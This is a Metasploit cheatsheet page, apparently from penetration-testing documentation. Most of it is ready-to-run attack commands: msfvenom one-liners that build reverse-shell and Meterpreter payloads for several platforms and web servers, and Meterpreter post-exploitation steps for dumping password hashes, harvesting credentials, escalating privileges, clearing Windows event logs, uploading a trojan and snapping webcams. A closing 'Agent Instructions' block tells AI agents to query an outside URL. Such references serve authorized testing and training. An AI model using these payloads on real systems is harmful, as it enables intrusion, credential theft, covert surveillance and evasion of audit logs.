# Metasploit Cheatsheet

## Resources

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/>" %}

{% embed url="<https://netsec.ws/?p=331>" %}

## Searchsploit

```
searchsploit <search>
searchsploit -x <file.txt> 
```

## Msfconsole

```
msfconsole -h #usage options
msf > help
msf > <command> -h
msf > help search

connect <ip> <port> #netcat like

edit #edit the current module

grep <http> search <oracle> #match output containing the string “http” from a search for modules containing the string “oracle”

info

load <plugin> #load plugin
unload <plugin> #unload plugin

route <add/remove> <subnet> <netmask> <session_id> #allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities
route flush #remove all routes
route print #show all active routes

search name:mysql
search type:post
search cve:2011 author:jduck platform:linux

background
sessions -l #list sessions
sessions -i 1 #interact with session 1

set <rhost> <ip> #configure options for the current module
unset <rhost> #remove a parameter
unset all # remove all parameters

setg <rhost> <ip> #set global variables
unsetg #unset global variables
save #after setting your different variables, you can run the save command to save your current environment and settings

show <auxiliary/exploits/...>
show options
show advanced #more options
show payloads
show targets
show encoders #useful in exploit development when you aren’t quite certain as to which payload encoding methods will work with a given exploit.
show nops #display nop generators
show evasion

use <module/module_id>

back
banner
check #see if the target is vulnerable, not often support
color
exit
irb #drop into a live Ruby interpreter shell
jobs #Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.
kill <0> #kill job 0
loadpath #load a third-part module tree for the path so you can point Metasploit at your 0-day exploits, encoders, payloads, etc.
resource <karma.rc> #runs resource (batch) files that can be loaded through msfconsole.

exploit -j # run in the background
```

## Msfvenom

```
### List payloads ###

msfvenom -l

### Binaries ###

## Linux ##

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

## Windows ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

## Mac ##

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

### Web Payloads ###

## PHP ##
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

## ASP ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

## ASPX ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

## JSP ##

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

## WAR ##

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

### Scripting Payloads ###

## Python ##

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

## Bash ##

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

## Perl ##

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

### Shellcode ###

#For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

## Linux Based Shellcode ##

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

## Windows Based Shellcode ##

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

## Mac Based Shellcode ##

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
```

## Handler

`use exploit/multi/handler`

## Shell to meterpreter

`post/multi/manage/shell_to_meterpreter`

## Meterpreter

```
help
background
clearev #clear the application, system and security logs on windows system
download <c:\\boot.ini> #use double-slashes
edit <file.txt> #use vim
execute -f <cmd.exe> -i -H #runs a command on the target
getuid #display the user running on the host
hashdump #dump SAM database
idletime #display time that the user at the remote machine has been idle
ipconfig
lpwd & lcd #change apply in local, not on the remote host
sysinfo
getsystem #to try priviledges escalation
ps
migrate <1832> #change current ps to ps 1832 to escalade (run post/windows/manage/migrate)
resource <resource.txt> #call a file with meterpreter instructions
search -f <autoexec.bat> #locate specific file
search -f <sea*.bat> <c:\\xamp\\>
shell #standard shell on the target system
upload <trojan.exe> <c:\\windows\\sytem32> #use double-slashes
webcam_list
webcam_snap
load <python/kiwi/...>
creds_all
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://man.protyro.eu/misc/metasploit-cheatsheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.